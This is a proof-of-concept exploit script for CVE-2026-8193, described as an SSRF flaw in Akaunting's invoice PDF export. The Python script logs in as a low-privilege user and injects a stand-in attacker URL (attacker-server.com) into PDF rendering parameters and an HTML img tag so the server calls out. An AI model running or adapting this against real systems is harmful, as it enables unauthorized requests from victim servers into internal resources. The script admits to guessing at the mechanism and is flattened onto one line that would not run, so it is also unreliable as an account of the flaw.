CVE-2026-8193 Akaunting发票渲染SSRF漏洞

import requests # Target configuration target_url = "http://vulnerable-akaunting-instance.com" login_endpoint = f"{target_url}/login" invoice_export_endpoint = f"{target_url}/invoices/export/pdf" # Attacker controlled server for SSRF callback attacker_callback_url = "http://attacker-server.com/capture" # Credentials (Low privilege required) credentials = { "email": "[email protected]", "password": "password" } # Start a session to maintain authentication session = requests.Session() # 1. Login to get session cookie login_response = session.post(login_endpoint, data=credentials) if login_response.status_code != 200: print("Login failed") exit() # 2. Exploit the vulnerability # The vulnerability is in the PDF rendering component processing config/dompdf.php # We inject a malicious URL that the server will fetch via SSRF # This payload simulates manipulating the options passed to the PDF generator payload_data = { # Injecting the SSRF payload into a parameter that influences PDF rendering # Depending on the exact implementation, this might be a custom header or form field "options[base_path]": attacker_callback_url, "html_content": f"<img src='{attacker_callback_url}/ssrf_test.png'>" } try: print(f"Sending exploit payload to {invoice_export_endpoint}...") response = session.post(invoice_export_endpoint, data=payload_data) if response.status_code == 200: print("Request sent successfully.") print("Check your callback server for incoming connections from the target.") else: print(f"Exploit request failed with status code: {response.status_code}") except Exception as e: print(f"An error occurred: {e}")